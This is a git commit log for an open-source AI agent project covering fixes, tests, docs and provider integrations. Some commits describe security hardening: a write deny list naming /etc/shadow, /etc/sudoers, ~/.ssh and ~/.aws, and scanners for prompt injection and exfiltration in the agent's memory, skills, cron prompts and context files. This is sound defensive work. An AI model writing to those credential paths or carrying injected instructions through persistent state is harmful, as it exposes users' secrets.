tests are in PR #61 (tests/tools/test_write_deny.py), so remove
them here to avoid ordering conflicts between the two PRs.
2026-02-26 13:43:30 +03:00
0xbyt4
2efd9bbac4 fix: resolve symlink bypass in write deny list on macOS
On macOS, /etc is a symlink to /private/etc. The _is_write_denied()
function resolves the input path with os.path.realpath() but the deny
list entries were stored as literal strings ("/etc/shadow"). This meant
the resolved path "/private/etc/shadow" never matched, allowing writes
to sensitive system files on macOS.

Fix: Apply os.path.realpath() to deny list entries at module load time
so both sides of the comparison use resolved paths.

Adds 19 regression tests in tests/tools/test_write_deny.py.
2026-02-26 13:30:55 +03:00
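A minimal sketch of resolving both sides of the comparison:

```python
import os

RAW_DENY = ["/etc/shadow", "/etc/sudoers"]

# Resolve entries once at module load so macOS's /etc -> /private/etc
# symlink cannot sidestep the comparison.
DENY = [os.path.realpath(p) for p in RAW_DENY]

def is_write_denied(path: str) -> bool:
    resolved = os.path.realpath(path)
    return resolved in DENY

# On macOS, "/etc/shadow" and "/private/etc/shadow" now both resolve
# to "/private/etc/shadow" and match the deny list.
```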
0xbyt4
0ac3af8776 test: add unit tests for 8 untested modules
Add comprehensive test coverage for:
- cron/jobs.py: schedule parsing, job CRUD, due-job detection (34 tests)
- tools/memory_tool.py: security scanning, MemoryStore ops, dispatcher (32 tests)
- toolsets.py: resolution, validation, composition, cycle detection (19 tests)
- tools/file_operations.py: write deny list, result dataclasses, helpers (37 tests)
- agent/prompt_builder.py: context scanning, truncation, skills index (24 tests)
- agent/model_metadata.py: token estimation, context lengths (16 tests)
- hermes_state.py: SessionDB SQLite CRUD, FTS5 search, export, prune (28 tests)

Total: 210 new tests, all passing (380 total suite).
2026-02-26 13:27:58 +03:00
Dean Kerr
fed9f06c4e fix: add SSH backend to terminal requirements check
The SSH backend was missing from check_terminal_requirements(), causing
it to fall through to `return False`. This silently disabled both the
terminal and file tools when TERMINAL_ENV=ssh was configured.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 20:41:59 +11:00
teknium1
240f33a06f feat(docker): add support check for Docker's --storage-opt option
- Introduced a static method to verify if the Docker storage driver supports the --storage-opt size= option.
- Enhanced resource argument handling in DockerEnvironment to conditionally include storage options based on the support check.
- Added caching for the support check result to optimize performance across instances.
2026-02-26 01:15:56 -08:00
Moritz Bierling
254aafb265 Fix SystemExit traceback during atexit cleanup on Ctrl+C
The browser_tool signal handler calls sys.exit(130) which raises
SystemExit. When this fires during terminal_tool's atexit cleanup
(specifically during _cleanup_thread.join()), it produces an unhandled
traceback. Wrapping the join in a try/except suppresses the race
without changing shutdown behavior.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
2026-02-26 10:13:31 +01:00
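A minimal sketch of the suppression; the cleanup thread is a stand-in for terminal_tool's real one:

```python
import atexit
import threading

_cleanup_thread = threading.Thread(target=lambda: None, daemon=True)
_cleanup_thread.start()

@atexit.register
def _shutdown() -> None:
    try:
        _cleanup_thread.join(timeout=5)
    except SystemExit:
        # A signal handler calling sys.exit(130) during this join would
        # otherwise surface as an unhandled traceback at exit.
        pass
```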
teknium1
8bd82119be docs: update README with security details and environment variable descriptions
- Added a section on security, detailing the minimal environment for child processes and the handling of API keys and credentials.
- Included new environment variables: `LLM_MODEL` for default model name and `HERMES_HOME` for overriding the config directory.
2026-02-26 01:12:57 -08:00
Teknium
9a148bb9a3 Merge pull request #51 from deankerr/fix/cli-env-path-resolution
fix: consistent HERMES_HOME and .env path resolution across all entry points
2026-02-26 01:09:02 -08:00
teknium1
7a4241e406 Co-authored-by: Dogila Developer <valeshera11@gmail.com> 2026-02-26 01:04:47 -08:00
teknium1
cb92fbe749 feat: add Notion block types reference documentation
- Introduced a new markdown file detailing various Notion block types for API usage, including examples for creating and reading blocks.
- Covered block types such as paragraphs, headings, lists, to-dos, quotes, callouts, code, toggles, dividers, bookmarks, images, and more.
- Provided structured JSON examples for each block type to assist developers in implementation.
2026-02-26 01:03:27 -08:00
Teknium
1d04074464 Merge pull request #53 from JoshuaMart/fix/install
fix(install): create ~/.hermes before moving Node.js directory
2026-02-26 00:58:34 -08:00
Teknium
c4096b4731 Merge pull request #27 from VolodymyrBg/fix/tool-context-docstring-threading
fix: align threading docstring with implementation
2026-02-26 00:56:49 -08:00
teknium1
178658bf9f test: enhance session source tests and add validation for chat types
- Renamed test method for clarity and added comprehensive tests for `SessionSource` including handling of numeric `chat_id`, missing optional fields, and invalid platforms.
- Introduced tests for session source descriptions based on chat types and names, ensuring accurate representation in prompts.
- Improved file tools tests by validating schema structures, ensuring no duplicate model IDs, and enhancing error handling in file operations.
2026-02-26 00:53:57 -08:00
teknium1
d372eb1f0e feat: add uv.lock file for package management
- Introduced a new `uv.lock` file to manage package dependencies and versions.
- Included details for packages such as `aiohappyeyeballs` and `aiohttp`, specifying their versions, sources, and available wheels.
- Set Python version requirements and resolution markers to ensure compatibility.
2026-02-26 00:53:50 -08:00
Joshua MARTINELLE
ebe25fefd6 Add missing mkdir 2026-02-26 09:39:11 +01:00
Joshua MARTINELLE
688ccf05cb Format 2026-02-26 09:38:51 +01:00
Dean Kerr
9dc5615b9d fix: use HERMES_HOME constant in doctor.py directory check
Line 184 hardcoded Path.home() / ".hermes" instead of using the
existing HERMES_HOME variable which already respects the env var.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 19:20:30 +11:00
Dean Kerr
696e2316a8 fix: respect HERMES_HOME and add encoding fallback in rl_cli.py
Consistent with other entry points: use _hermes_home from HERMES_HOME
env var, and add UTF-8 → latin-1 encoding fallback on load_dotenv.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 19:01:13 +11:00
Dean Kerr
f2891b70d0 fix: respect HERMES_HOME env var in gateway and cron scheduler
Both entry points hardcoded Path.home() / ".hermes" for .env, config.yaml,
logs, and lock files. Now uses _hermes_home which reads HERMES_HOME env var
with ~/.hermes as default, matching cli.py and run_agent.py.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 18:51:46 +11:00
Teknium
dcf370cb6e Merge pull request #34 from 0xbyt4/test/reorganize-and-add-unit-tests
test: reorganize test structure and add missing unit tests
2026-02-25 23:49:34 -08:00
teknium1
1b8eb85eeb Add npm audit checks for Node.js packages in doctor.py
- Implemented functionality to run `npm audit` for specified Node.js package directories.
- Added checks for vulnerabilities, reporting critical, high, and moderate issues.
- Enhanced user feedback based on audit results, guiding users on necessary actions for vulnerabilities.
2026-02-25 23:47:39 -08:00
Dean Kerr
cf3236ed27 fix: resolve .env path from ~/.hermes/ in cli.py, matching run_agent.py pattern
Load ~/.hermes/.env first with project root as dev fallback, and remove
redundant second load_dotenv call inside load_cli_config(). Also sets
MSWEA_GLOBAL_CONFIG_DIR so mini-swe-agent shares the same config.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 18:37:20 +11:00
teknium1
6c86c7c4a9 Add output format examples for YouTube content
- Introduced a new markdown file detailing various output formats including chapters, summaries, Twitter threads, blog posts, and quotes.
- Each section provides structured examples to guide content creators in presenting their video material effectively.
2026-02-25 23:28:16 -08:00
teknium1
9cc2cf3241 Add youtube transcript collection skill:
Co-authored-by: UfukNode <ufuk@crivacy.io>
2026-02-25 23:28:09 -08:00
teknium1
9eb4a4a481 fix: gateway credential resolution, memory flush auth, and LLM_MODEL fallback
- Custom endpoint (OPENAI_API_KEY/OPENAI_BASE_URL) now works in gateway and cron
- Memory flush on /reset passes credentials to temp agent
- LLM_MODEL env var fallback matches CLI priority chain
- Obsidian skill: replace hardcoded paths with OBSIDIAN_VAULT_PATH env var
- Setup wizard: strip emojis from TerminalMenu to fix macOS rendering
- execute_code: allowlist-filter child process environment variables

Co-authored-by: VencentSoliman <4spacetuna@gmail.com>
2026-02-25 23:20:57 -08:00
Teknium
8463b7ea59 Merge pull request #46 from rsavitt/fix/docker-backend-macos
Fix Docker backend on macOS and subagent auth for Nous Portal
2026-02-25 23:17:25 -08:00
Teknium
faa185e37c Merge branch 'main' into fix/docker-backend-macos 2026-02-25 23:14:57 -08:00
Teknium
53b3177ca5 Merge pull request #48 from deankerr/fix/config-path-resolution
fix: resolve .env and config paths from ~/.hermes/, not project root
2026-02-25 23:11:30 -08:00
teknium1
76badfed63 Enhance CLI documentation and functionality for session resumption
- Updated README and CLI documentation to include new commands for resuming sessions: `--continue` for the most recent session and `--resume <id>` for specific sessions.
- Added examples in the CLI help output and detailed instructions on resuming sessions in the documentation.
- Improved user experience by automatically displaying the resume command upon exiting a session.
2026-02-25 23:04:08 -08:00
teknium1
3c1e31de3e Implement session continuation feature in CLI
- Added a new command-line argument `--continue` to allow users to resume the most recent CLI session easily.
- Introduced a helper function to retrieve the last session ID from the database.
- Updated command handling to integrate the new session continuation functionality.
2026-02-25 23:00:10 -08:00
teknium1
d2c932d3ac add session resumption for CLI with easy copy-paste command 2026-02-25 22:56:12 -08:00
Dean Kerr
5a569eb1b6 fix: resolve .env and config paths from HERMES_HOME, not PROJECT_ROOT
The `hermes` CLI entry point (hermes_cli/main.py) and the agent runner
(run_agent.py) only loaded .env from the project installation directory.
After the standard installer, code lives at ~/.hermes/hermes-agent/ but
config lives at ~/.hermes/ — so the .env was never found.

Aligns these entry points with the pattern already used by gateway/run.py
and rl_cli.py: load ~/.hermes/.env first, fall back to project root .env
for dev-mode compatibility.

Also fixes:
- status.py checking .env existence and API keys at PROJECT_ROOT
- doctor.py KeyError on tool availability (missing_vars vs env_vars)
- doctor.py checking logs/ and Skills Hub at PROJECT_ROOT instead of HERMES_HOME
- doctor.py redundant logs/ check (already covered by subdirectory loop)
- mini-swe-agent loading config from platformdirs default instead of ~/.hermes/

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 16:49:14 +11:00
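A minimal sketch of the lookup order those entry points now share:

```python
import os
from pathlib import Path

from dotenv import load_dotenv

# HERMES_HOME overrides the config directory; ~/.hermes is the default.
HERMES_HOME = Path(os.environ.get("HERMES_HOME", str(Path.home() / ".hermes")))
PROJECT_ROOT = Path(__file__).resolve().parent

# Installed layout keeps config in ~/.hermes/, so load that .env first
# and fall back to the project root only for dev checkouts.
if (HERMES_HOME / ".env").exists():
    load_dotenv(HERMES_HOME / ".env")
else:
    load_dotenv(PROJECT_ROOT / ".env")
```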
teknium1
e5bd25c73f Fix: #41 2026-02-25 21:16:15 -08:00
teknium1
eb88474dd8 fix: strip emoji characters from menu labels in TerminalMenu
- Added regex to remove emoji characters from menu items to prevent visual issues on macOS, ensuring proper display and functionality.
2026-02-25 21:13:35 -08:00
teknium1
9fc0ca0a72 add full support for WhatsApp 2026-02-25 21:04:36 -08:00
Raeli Savitt
95b6bd5df6 Harden agent attack surface: scan writes to memory, skills, cron, and context files
The security scanner (skills_guard.py) was only wired into the hub install path.
All other write paths to persistent state — skills created by the agent, memory
entries, cron prompts, and context files — bypassed it entirely. This closes
those gaps:

- file_operations: deny-list blocks writes to ~/.ssh, ~/.aws, ~/.hermes/.env, etc.
- code_execution_tool: filter secret env vars from sandbox child process
- skill_manager_tool: wire scan_skill() into create/edit/patch/write_file with rollback
- skills_guard: add "agent-created" trust level (same policy as community)
- memory_tool: scan content for injection/exfil before system prompt injection
- prompt_builder: scan AGENTS.md, .cursorrules, SOUL.md for prompt injection
- cronjob_tools: scan cron prompts for critical threats before scheduling

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 23:43:15 -05:00
teknium1
f1311ad3de refactor: update Obsidian vault path handling
- Changed the hardcoded vault path to be set via the OBSIDIAN_VAULT_PATH environment variable, with a default fallback.
- Updated all relevant commands to utilize the new variable for reading, listing, searching, creating, and appending notes, improving flexibility and usability.
2026-02-25 20:24:51 -08:00
Raeli Savitt
0310170869 Fix subagent auth: propagate parent API key to child agents
When using Nous Portal (or any non-OpenRouter provider), child agents
spawned by delegate_task failed with "No pricing available" or "Unknown
model" errors because they had no valid API key.

The delegate tool passed base_url but not api_key to child AIAgent
instances. Without an explicit key, children fell back to the empty
OPENROUTER_API_KEY env var, causing auth failures.

Extract the parent's API key from _client_kwargs and pass it through.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 22:37:36 -05:00
Raeli Savitt
b6d7e222c1 Fix Docker backend failures on macOS
Three issues prevented the Docker terminal backend from working:

1. `effective_image` was referenced but never defined — only the Modal
   backend sets this variable. Use `image` directly instead.

2. `--storage-opt size=N` is unsupported on Docker Desktop for Mac
   (requires overlay2 with xfs backing). Skip the flag on Darwin.

3. Docker requires absolute paths for `-w` (working directory) but the
   default cwd was `~`, which Docker does not expand. Default to `/root`
   and translate any `~` passed in from callers.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 22:31:05 -05:00
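A minimal sketch of fixes 2 and 3; the size value and flag layout are illustrative:

```python
import platform

def docker_run_args(image: str, cwd: str = "~") -> list[str]:
    # Docker requires an absolute -w and does not expand "~" itself.
    workdir = "/root" + cwd[1:] if cwd.startswith("~") else cwd
    args = ["docker", "run", "-d", "-w", workdir]
    # --storage-opt size= needs overlay2 on xfs backing, which Docker
    # Desktop for Mac lacks, so only pass the flag off-Darwin.
    if platform.system() != "Darwin":
        args += ["--storage-opt", "size=20G"]
    return args + [image]
```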
George Pickett
e71d9a89d2 Merge origin/main into codex/align-codex-provider-conventions-mainrepo 2026-02-25 19:28:44 -08:00
George Pickett
74c662b63a Harden Codex auth refresh and responses compatibility 2026-02-25 19:27:54 -08:00
George Pickett
91bdb9eb2d Fix Codex stream fallback for Responses completion gaps 2026-02-25 19:08:11 -08:00
George Pickett
47f16505d2 Omit optional function_call id in Responses replay input 2026-02-25 19:00:11 -08:00
George Pickett
e63986b534 Harden Codex stream handling and ack continuation 2026-02-25 18:56:06 -08:00
teknium1
cbde8548f4 Fix for gateway not using Nous auth (issue #28) 2026-02-25 18:51:28 -08:00
teknium1
7a3656aea2 refactor: integrate Nous Portal support in auxiliary client
- Added functionality to include product attribution tags for Nous Portal in auxiliary API calls.
- Introduced a mechanism to determine if the auxiliary client is backed by Nous Portal, affecting the extra body of requests.
- Updated various tools to utilize the new extra body configuration for enhanced tracking in API calls.
2026-02-25 18:39:36 -08:00
George Pickett
3ba8b15f13 Tone down Codex docs and prompt wording 2026-02-25 18:25:15 -08:00
George Pickett
7727a792f2 Revert README Codex messaging changes 2026-02-25 18:21:50 -08:00
George Pickett
ce175d7372 Fix Codex Responses continuation and schema parity 2026-02-25 18:20:41 -08:00
George Pickett
609b19b630 Add OpenAI Codex provider runtime and responses integration (without .agent/PLANS.md) 2026-02-25 18:20:38 -08:00
teknium1
e3cb957a10 refactor: streamline reasoning configuration checks in AIAgent
- Simplified the logic for determining support for reasoning based on the base URL by introducing clearer variable names.
- Added product attribution for the Nous Portal to the extra body of requests when applicable, enhancing tagging for better tracking.
2026-02-25 16:49:41 -08:00
teknium1
55a0178490 refactor: enhance configuration loading for GatewayRunner
- Implemented dynamic loading of environment variables and configuration from a YAML file to ensure fresh credentials for the GatewayRunner.
- Improved error handling during the loading process to accommodate different encoding scenarios and potential exceptions.
2026-02-25 16:40:52 -08:00
teknium1
9a858b8d67 add identifier for OpenRouter calls 2026-02-25 16:34:47 -08:00
teknium1
cbff32585d one more Windows fix 2026-02-25 16:27:40 -08:00
0xbyt4
8fc28c34ce test: reorganize test structure and add missing unit tests
Reorganize flat tests/ directory to mirror source code structure
(tools/, gateway/, hermes_cli/, integration/). Add 11 new test files
covering previously untested modules: registry, patch_parser,
fuzzy_match, todo_tool, approval, file_tools, gateway session/config/
delivery, and hermes_cli config/models. Total: 147 unit tests passing,
9 integration tests gated behind pytest marker.
2026-02-26 03:20:08 +03:00
teknium1
d72b9eadec More fixes for Windows 2026-02-25 15:20:42 -08:00
teknium1
3c5bf5b9d8 refactor: enhance error handling in user prompts
- Updated exception handling in multiple prompt functions to catch NotImplementedError alongside ImportError, improving robustness across the application.
- Ensured fallback mechanisms are clearly documented for better understanding of platform limitations.
2026-02-25 14:10:54 -08:00
VolodymyrBg
5a07e26405 fix: align threading docstring with implementation 2026-02-25 23:56:06 +02:00
teknium1
cd66546e24 refactor: enhance install script output and command handling
- Updated the SSH cloning process to include a cleanup step for partial clones if the SSH attempt fails, improving the fallback to HTTPS.
- Modified output messages for clarity, including renaming the gateway installation command to better reflect its function.
2026-02-25 13:47:04 -08:00
teknium1
21a59a4a7c refactor: improve SSH cloning process in install script
- Added GIT_SSH_COMMAND to disable interactive prompts and set a timeout for SSH cloning, enhancing the cloning process for private repositories.
- Implemented cleanup of partial SSH clones if the SSH attempt fails, ensuring a smoother fallback to HTTPS cloning.
2026-02-25 13:41:16 -08:00
teknium1
b5dbf8e43d Update model version in hermes_cli to use openai/gpt-5.3-codex 2026-02-25 13:26:14 -08:00
teknium1
54e50b8a6e Update README.md to clarify the description of the AI agent, emphasizing its fully open-source nature and enhancing the overall messaging for better understanding. 2026-02-25 12:15:53 -08:00
teknium1
b35dbb0420 Update README.md to refine the description of the AI agent, emphasizing its growth and autonomy while streamlining the language for clarity. 2026-02-25 11:58:16 -08:00
teknium1
63f6afd75b Update README.md to replace badge links with new styles and add a link to the X platform for Nous Research 2026-02-25 11:56:12 -08:00
teknium1
3e311a0092 Update banner image to new version 2026-02-25 11:53:44 -08:00
teknium1
69d3d3c15a Hide Hermes model until next release with agentic capabilities 2026-02-25 11:00:06 -08:00
teknium1
33bc1a3b58 docs: add sandboxed terminal usage recommendations to README
- Introduced a new section in the README outlining the benefits and configurations for running Hermes with a sandboxed terminal backend.
- Provided examples for SSH, Docker, and Modal cloud sandbox setups to enhance security and isolation during command execution.
2026-02-25 10:38:55 -08:00
teknium1
740dd928f7 Release set of skills 2026-02-25 05:21:17 -08:00
teknium1
757d012ab5 refactor: remove outdated skills and references from MLOps
- Deleted the `huggingface-accelerate` skill documentation, which included details on distributed training and common workflows.
- Removed `custom-plugins.md`, `megatron-integration.md`, `performance.md`, and other related reference documents that were no longer relevant or necessary.
- This cleanup aims to streamline the MLOps skills repository and improve maintainability.
2026-02-25 04:22:48 -08:00
teknium1
f64a87209d refactor: enhance session content handling in AIAgent and update TTS output path
- Introduced a new static method `_clean_session_content` in the `AIAgent` class to convert REASONING_SCRATCHPAD tags to <think> blocks and clean up whitespace in session logs.
- Updated the `_save_session_log` method to utilize the cleaned content for assistant messages, ensuring consistency in session logs.
- Changed the default output directory for TTS audio files from `~/voice-memos` to `~/.hermes/audio_cache`, reflecting a more appropriate storage location.
2026-02-25 04:22:03 -08:00
teknium1
41df8ee4f5 refactor: enhance interrupt handling in AIAgent class
- Updated the `clear_interrupt` method to also reset the global tool interrupt signal, improving the clarity of interrupt management within the agent.
- This change ensures that all interrupt states are properly cleared, enhancing the reliability of the agent's operation.
2026-02-25 03:45:47 -08:00
teknium1
6877d5f3b5 docs: add note on message delivery in cronjob_tools
- Included a note clarifying that the agent's final response is auto-delivered to the target, advising against using send_message in the prompt. This enhances user understanding of the message delivery process.
2026-02-25 03:29:10 -08:00
teknium1
6d74d424d3 refactor: update job execution configuration loading in scheduler
- Implemented dynamic loading of environment variables and configuration settings for job execution, allowing for real-time updates without restarting the gateway.
- Enhanced model and API configuration retrieval from both environment variables and a YAML configuration file, improving flexibility and adaptability of the job execution process.
2026-02-25 02:54:13 -08:00
teknium1
9ec4f7504b Provide example datagen config scripts 2026-02-25 02:27:41 -08:00
teknium1
9166d56f17 style: enhance landing page responsiveness and layout
- Added overflow-x hidden to prevent horizontal scrolling on the landing page.
- Updated mobile styles for various elements including hero, sections, and grids to improve layout and readability on smaller screens.
- Adjusted padding, font sizes, and display properties for better user experience across devices.
2026-02-24 18:11:27 -08:00
teknium1
80b90dd0d9 refactor: update landing page metadata for clarity and engagement
- Revised the title and description in the landing page to better convey the agent's adaptability and user-centric features.
- Enhanced Open Graph description for improved social media sharing and clarity of the agent's capabilities.
2026-02-24 18:08:57 -08:00
teknium1
91907789af refactor: remove temporary debug logging in code execution tool
- Eliminated the temporary debug logging in the `execute_code` function that tracked enabled and sandbox tools, streamlining the code and reducing clutter.
2026-02-24 14:25:53 -08:00
teknium1
6845852e82 refactor: update failure message handling in display module and add debug logging in code execution tool
- Modified the `_wrap` function to append a failure suffix without applying red coloring, simplifying the failure message format.
- Introduced temporary debug logging in the `execute_code` function to track enabled and sandbox tools, aiding in troubleshooting.
2026-02-24 14:25:53 -08:00
teknium1
99af12af3f chore: update landing page hero text for improved messaging
- Changed the hero title from "An AI agent you can actually live with." to "An agent that grows with you." to better reflect the agent's adaptability and user-centric approach.
- This update aims to enhance the overall appeal and clarity of the landing page content.
2026-02-24 04:13:45 -08:00
teknium1
fd76ff60ac fix: improve stdout/stderr handling in delegate_task function
- Saved and restored stdout/stderr to prevent redirection issues in child threads, ensuring consistent output during task delegation.
- Enhanced reliability of output handling in concurrent execution scenarios.
2026-02-24 04:13:32 -08:00
teknium1
cc6bea8b90 feat: enhance session search tool with parent session resolution and parallel summarization
- Added a new function to resolve child sessions to their parent, improving session grouping and deduplication.
- Refactored session summarization to run in parallel, enhancing performance and responsiveness.
- Updated search syntax documentation to clarify usage of keywords and phrases for better search results.
2026-02-24 04:07:37 -08:00
teknium1
c1d9e9a285 refactor: improve stdout handling in KawaiiSpinner class
- Captured stdout at spinner creation to prevent redirection issues from child agents.
- Replaced direct print statements with a new `_write` method for consistent output handling during spinner animation and final message display.
- Enhanced code maintainability and clarity by centralizing output logic.
2026-02-24 03:48:11 -08:00
teknium1
681141a526 fix: ANSI escapes causing broken terminal CLI output 2026-02-24 03:42:12 -08:00
teknium1
c100541f07 refactor: remove direct stdout handling in spinner class
- Eliminated the `_raw_write` function to simplify output handling in the `KawaiiSpinner` class.
- Updated spinner animation and final message display to use standard print statements, ensuring compatibility with prompt_toolkit.
- Improved code clarity and maintainability by reducing complexity in the output rendering process.
2026-02-24 03:40:52 -08:00
teknium1
d64f62c2ef feat: enhance spinner output handling in display module
- Added a new function `_raw_write` to write directly to stdout, bypassing prompt_toolkit's interference with ANSI escapes and carriage returns.
- Updated the `KawaiiSpinner` class to utilize `_raw_write` for rendering spinner animations and final messages, ensuring proper display in terminal environments.
- Improved the clarity of output handling during spinner operations, enhancing user experience during tool execution.
2026-02-24 03:30:28 -08:00
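The bypass boils down to writing to the interpreter's original stream instead of the patched sys.stdout; a sketch, with only the function name taken from the commit above:

    import sys

    def _raw_write(text: str) -> None:
        # sys.__stdout__ is the stream captured at interpreter startup, so this
        # sidesteps prompt_toolkit's StdoutProxy patching of sys.stdout.
        stream = sys.__stdout__
        stream.write(text)
        stream.flush()

    # Example: redraw a spinner frame in place with a carriage return.
    _raw_write("\r| working...")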
teknium1
e049441d93 feat: add reasoning effort configuration for agent
- Introduced a new configuration option for reasoning effort in the CLI, allowing users to specify the level of reasoning the agent should perform before responding.
- Updated the CLI and agent initialization to incorporate the reasoning configuration, enhancing the agent's responsiveness and adaptability.
- Implemented logic to load reasoning effort from environment variables and configuration files, providing flexibility in agent behavior.
- Enhanced the documentation in the example configuration file to clarify the new reasoning effort options available.
2026-02-24 03:30:19 -08:00
teknium1
a30b2f34eb feat: add landing page for Hermes Agent
- Introduced a new landing page with HTML, CSS, and JavaScript files to showcase the Hermes Agent.
- Added a banner image and logo to enhance visual appeal.
- Implemented interactive features such as a copy-to-clipboard function for installation commands and scroll-triggered animations for improved user engagement.
- Designed a responsive layout with sections detailing the agent's features, installation instructions, and community links.
2026-02-24 03:25:22 -08:00
teknium1
2bf96ad244 feat: add ephemeral prefill messages and system prompt loading
- Implemented functionality to load ephemeral prefill messages from a JSON file, enhancing few-shot priming capabilities for the agent.
- Introduced a mechanism to load an ephemeral system prompt from environment variables or configuration files, ensuring dynamic prompt adjustments at API-call time.
- Updated the CLI and agent initialization to utilize the new prefill messages and system prompt, improving the overall interaction experience.
- Enhanced configuration options with new environment variables for prefill messages and system prompts, allowing for greater customization without persistence.
2026-02-23 23:55:42 -08:00
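A sketch of prefill loading along these lines, assuming an environment variable that points at a JSON list of chat messages; the variable name is hypothetical:

    import json
    import os
    from pathlib import Path

    def load_prefill_messages() -> list:
        """Load few-shot prefill messages from a JSON file, if configured."""
        path = os.getenv("HERMES_PREFILL_MESSAGES")  # hypothetical variable name
        if not path:
            return []
        data = json.loads(Path(path).read_text(encoding="utf-8"))
        # Keep only {"role": ..., "content": ...} shaped entries.
        return [m for m in data if isinstance(m, dict) and "role" in m and "content" in m]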
teknium1
a183827128 feat: enhance README and improve environment configuration
- Added a new section in the README for Inference Providers, detailing setup instructions for Nous Portal, OpenRouter, and Custom Endpoints, improving user guidance for LLM connections.
- Updated messaging platform setup instructions to include Slack and WhatsApp, providing clearer steps for configuration.
- Introduced a new environment variable, TERMINAL_SANDBOX_DIR, to allow users to customize the sandbox storage location for Docker and Singularity environments.
- Refactored the Docker and Singularity environment classes to utilize the new sandbox directory for persistent workspaces, enhancing organization and usability.
- Improved handling of working directories across various environments, ensuring compatibility and clarity in execution paths.
2026-02-23 21:15:35 -08:00
teknium1
54dd1b3038 feat: enhance README and update API client initialization
- Updated the README to include new badges, a detailed description of the Hermes Agent, and a table summarizing its features, improving clarity and presentation for users.
- Modified the API client initialization in `transcription_tools.py` and `tts_tool.py` to include a base URL, ensuring compatibility with the OpenAI API.
2026-02-23 20:59:39 -08:00
Teknium
75d251b81a feat: add API key requirement checks for toolsets
- Introduced a new mapping for toolset environment variable requirements, enhancing the configuration process by prompting users for missing API keys.
- Implemented a function to check and prompt users for necessary API keys when enabling toolsets, improving user experience and ensuring proper setup.
- Updated the tools command to integrate the new API key checks, streamlining the configuration workflow for users.
2026-02-24 00:01:39 +00:00
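The mapping-plus-prompt flow can be as small as the sketch below; the toolset names and env vars shown are examples, not the repository's actual table:

    import os

    # Example mapping only; the real toolset/env-var requirements live in the repo.
    TOOLSET_ENV_REQUIREMENTS = {
        "voice": ["VOICE_TOOLS_OPENAI_KEY"],
        "browser": ["BROWSERBASE_API_KEY"],  # hypothetical entry
    }

    def missing_keys_for(toolset: str) -> list:
        return [v for v in TOOLSET_ENV_REQUIREMENTS.get(toolset, ()) if not os.getenv(v)]

    def prompt_for_missing_keys(toolset: str) -> None:
        for var in missing_keys_for(toolset):
            value = input(f"{toolset} needs {var} - enter a value (blank to skip): ").strip()
            if value:
                os.environ[var] = value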
Teknium
7a6d4666a2 refactor: clarify user prompts in checklist interfaces
- Updated messaging in the checklist prompts to simplify instructions for item selection, changing "Press SPACE to select items, then ENTER on Continue" to "SPACE to toggle, ENTER to confirm."
- Removed the "Continue →" entry from the menu items to streamline the selection process.
- Enhanced user experience by clarifying input prompts and removing unnecessary options, ensuring a more intuitive interaction.
2026-02-23 23:57:31 +00:00
Teknium
d802db4de0 refactor: improve tool configuration prompts for clarity
- Updated the display format of tool descriptions in the configuration prompts to enhance readability.
- Simplified the messaging for enabled tool counts, removing unnecessary color formatting for a cleaner output.
- Streamlined the exit message for the configuration process, improving user experience during tool setup.
2026-02-23 23:54:38 +00:00
Teknium
b103bb4c8b feat: add interactive tool configuration command
- Introduced a new `tools` command in the CLI for configuring enabled tools per platform.
- Implemented an interactive checklist for users to enable or disable toolsets for various platforms, enhancing customization options.
- Created a new `tools_config.py` file to handle the logic for toolset management and user prompts, improving code organization and user experience.
2026-02-23 23:52:07 +00:00
Teknium
a9d16c40c7 refactor: streamline API key prompt in setup wizard
- Introduced a new helper function to handle API key prompts, improving code organization and readability.
- Enhanced user experience by providing a formatted display for API key input, including tool descriptions and URLs.
- Simplified the setup wizard by replacing inline API key handling with the new helper function, ensuring consistent messaging and feedback during configuration.
2026-02-23 23:38:33 +00:00
Teknium
98e3a26b2a refactor: update user prompt in setup wizard for item selection
- Modified the prompt in the setup wizard to clarify the selection process, instructing users to press SPACE to select items and ENTER to continue, enhancing user experience during configuration.
2026-02-23 23:36:59 +00:00
Teknium
f209a92b7e refactor: enhance setup wizard for messaging platform configuration
- Updated the setup wizard to present messaging platforms as a checklist, allowing users to select which platforms to configure.
- Preserved the order of platforms while grouping them for improved clarity.
- Enhanced user prompts for setting up each selected messaging platform, streamlining the configuration process.
2026-02-23 23:32:32 +00:00
Teknium
0edfc7fa49 refactor: update tool progress environment variable defaults and improve setup wizard prompts
- Changed default value for HERMES_TOOL_PROGRESS from "false" to "true" to enable tool progress notifications by default.
- Updated default value for HERMES_TOOL_PROGRESS_MODE from "new" to "all" to provide more comprehensive progress updates.
- Enhanced the setup wizard prompts for enabling tool progress messages and context compression, improving user guidance and experience.
2026-02-23 23:31:07 +00:00
Teknium
cefe038a87 refactor: enhance environment variable configuration and setup wizard
- Updated the OPTIONAL_ENV_VARS dictionary to include a new "category" field for better organization of environment variables.
- Improved the setup wizard to categorize missing optional environment variables into tools and messaging platforms, enhancing user experience during configuration.
- Streamlined the prompts for configuring tools and messaging platforms, allowing for a more intuitive setup process.
2026-02-23 23:25:38 +00:00
Teknium
0858ee2f27 refactor: rename HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY
- Updated the environment variable name from HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY across multiple files to avoid interference with OpenRouter.
- Adjusted related error messages and configuration prompts to reflect the new variable name, ensuring consistency throughout the codebase.
2026-02-23 23:21:33 +00:00
Teknium
4d1f2ea522 refactor: remove unused multi_select_cursor_brackets_style in prompt_checklist function
- Eliminated the multi_select_cursor_brackets_style parameter from the prompt_checklist function, simplifying the code and improving clarity in the multi-select user interface.
2026-02-23 23:18:57 +00:00
Teknium
6447a6020c feat: add Node.js installation support to the setup script
- Introduced automatic installation of Node.js version 22 if not found on the system, enhancing the setup process for browser tools.
- Improved the check for existing Node.js installations, including support for Hermes-managed installations.
